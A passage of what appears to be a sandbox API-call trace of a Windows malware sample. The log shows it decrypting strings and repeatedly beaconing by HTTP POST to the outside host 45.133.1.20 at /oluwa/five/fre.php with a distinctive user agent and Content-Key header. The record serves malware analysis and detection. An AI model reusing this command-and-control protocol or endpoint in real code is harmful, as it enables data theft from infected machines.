pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.100] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.100] GetProcessHeap () returned 0x6a0000 [0229.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0229.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.108] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0229.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.109] CryptDestroyKey (hKey=0x6ad020) returned 1 [0229.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.111] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0229.111] GetProcessHeap () returned 0x6a0000 [0229.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0229.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.112] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.114] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.115] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.116] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.116] GetProcessHeap () returned 0x6a0000 [0229.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0229.116] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0229.117] GetProcessHeap () returned 0x6a0000 [0229.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0229.117] GetProcessHeap () returned 0x6a0000 [0229.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0229.118] GetProcessHeap () returned 0x6a0000 [0229.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0229.118] GetProcessHeap () returned 0x6a0000 [0229.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0229.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.122] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.131] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0229.138] GetProcessHeap () returned 0x6a0000 [0229.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0229.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.142] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0229.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.143] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.144] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.144] GetProcessHeap () returned 0x6a0000 [0229.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0229.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.146] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0229.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.147] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0229.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.149] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0229.149] GetProcessHeap () returned 0x6a0000 [0229.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0229.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.150] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0229.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.152] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0229.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.154] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0229.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.155] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0229.155] GetProcessHeap () returned 0x6a0000 [0229.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0229.155] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0229.155] GetProcessHeap () returned 0x6a0000 [0229.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0229.155] socket (af=2, type=1, protocol=6) returned 0x6e8 [0229.155] connect (s=0x6e8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0229.179] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0229.179] GetProcessHeap () returned 0x6a0000 [0229.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0229.179] GetProcessHeap () returned 0x6a0000 [0229.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0229.180] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0229.181] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0229.181] GetProcessHeap () returned 0x6a0000 [0229.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9e40 [0229.181] GetProcessHeap () returned 0x6a0000 [0229.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0229.182] GetProcessHeap () returned 0x6a0000 [0229.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0229.182] GetProcessHeap () returned 0x6a0000 [0229.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0229.183] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0229.185] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0229.185] GetProcessHeap () returned 0x6a0000 [0229.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0229.186] GetProcessHeap () returned 0x6a0000 [0229.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0229.187] send (s=0x6e8, buf=0x6bd460*, len=242, flags=0) returned 242 [0229.188] send (s=0x6e8, buf=0x6bb998*, len=159, flags=0) returned 159 [0229.188] GetProcessHeap () returned 0x6a0000 [0229.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0229.188] recv (in: s=0x6e8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0229.264] GetProcessHeap () returned 0x6a0000 [0229.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0229.265] GetProcessHeap () returned 0x6a0000 [0229.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0229.266] GetProcessHeap () returned 0x6a0000 [0229.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9e40 | out: hHeap=0x6a0000) returned 1 [0229.266] GetProcessHeap () returned 0x6a0000 [0229.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0229.267] closesocket (s=0x6e8) returned 0 [0229.267] GetProcessHeap () returned 0x6a0000 [0229.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0229.267] GetProcessHeap () returned 0x6a0000 [0229.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0229.268] GetProcessHeap () returned 0x6a0000 [0229.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0229.268] GetProcessHeap () returned 0x6a0000 [0229.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0229.269] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1410) returned 0x6e8 [0229.271] Sleep (dwMilliseconds=0xea60) [0229.273] GetProcessHeap () returned 0x6a0000 [0229.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0229.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.274] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.282] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0229.293] GetProcessHeap () returned 0x6a0000 [0229.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0229.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.297] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0229.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.299] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.301] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.301] GetProcessHeap () returned 0x6a0000 [0229.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0229.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.303] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0229.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.304] CryptDestroyKey (hKey=0x6ad020) returned 1 [0229.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.314] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0229.314] GetProcessHeap () returned 0x6a0000 [0229.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0229.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.315] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.316] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.317] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.318] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.318] GetProcessHeap () returned 0x6a0000 [0229.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0229.318] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0229.318] GetProcessHeap () returned 0x6a0000 [0229.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0229.319] GetProcessHeap () returned 0x6a0000 [0229.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0229.319] GetProcessHeap () returned 0x6a0000 [0229.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0229.320] GetProcessHeap () returned 0x6a0000 [0229.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0229.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.321] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.342] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0229.354] GetProcessHeap () returned 0x6a0000 [0229.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0229.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.356] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0229.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.357] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.359] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.359] GetProcessHeap () returned 0x6a0000 [0229.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0229.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.361] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0229.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.361] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0229.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.363] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0229.363] GetProcessHeap () returned 0x6a0000 [0229.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0229.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.365] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0229.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.366] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0229.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.367] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0229.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.371] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0229.371] GetProcessHeap () returned 0x6a0000 [0229.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0229.371] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0229.371] GetProcessHeap () returned 0x6a0000 [0229.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0229.371] socket (af=2, type=1, protocol=6) returned 0x6ec [0229.371] connect (s=0x6ec, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0229.424] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0229.424] GetProcessHeap () returned 0x6a0000 [0229.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0229.424] GetProcessHeap () returned 0x6a0000 [0229.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0229.425] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0229.426] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0229.426] GetProcessHeap () returned 0x6a0000 [0229.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d99c0 [0229.426] GetProcessHeap () returned 0x6a0000 [0229.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0229.426] GetProcessHeap () returned 0x6a0000 [0229.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0229.426] GetProcessHeap () returned 0x6a0000 [0229.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0229.427] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0229.429] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0229.429] GetProcessHeap () returned 0x6a0000 [0229.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0229.429] GetProcessHeap () returned 0x6a0000 [0229.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0229.429] send (s=0x6ec, buf=0x6bd460*, len=242, flags=0) returned 242 [0229.430] send (s=0x6ec, buf=0x6bb998*, len=159, flags=0) returned 159 [0229.430] GetProcessHeap () returned 0x6a0000 [0229.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0229.430] recv (in: s=0x6ec, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0229.503] GetProcessHeap () returned 0x6a0000 [0229.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0229.504] GetProcessHeap () returned 0x6a0000 [0229.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0229.504] GetProcessHeap () returned 0x6a0000 [0229.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d99c0 | out: hHeap=0x6a0000) returned 1 [0229.506] GetProcessHeap () returned 0x6a0000 [0229.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0229.506] closesocket (s=0x6ec) returned 0 [0229.507] GetProcessHeap () returned 0x6a0000 [0229.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0229.507] GetProcessHeap () returned 0x6a0000 [0229.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0229.508] GetProcessHeap () returned 0x6a0000 [0229.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0229.508] GetProcessHeap () returned 0x6a0000 [0229.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0229.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1414) returned 0x6ec [0229.511] Sleep (dwMilliseconds=0xea60) [0229.512] GetProcessHeap () returned 0x6a0000 [0229.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0229.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.514] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.522] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0229.528] GetProcessHeap () returned 0x6a0000 [0229.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0229.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.530] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0229.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.531] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.532] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.532] GetProcessHeap () returned 0x6a0000 [0229.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0229.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.534] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0229.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.534] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0229.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.536] CryptReleaseContext 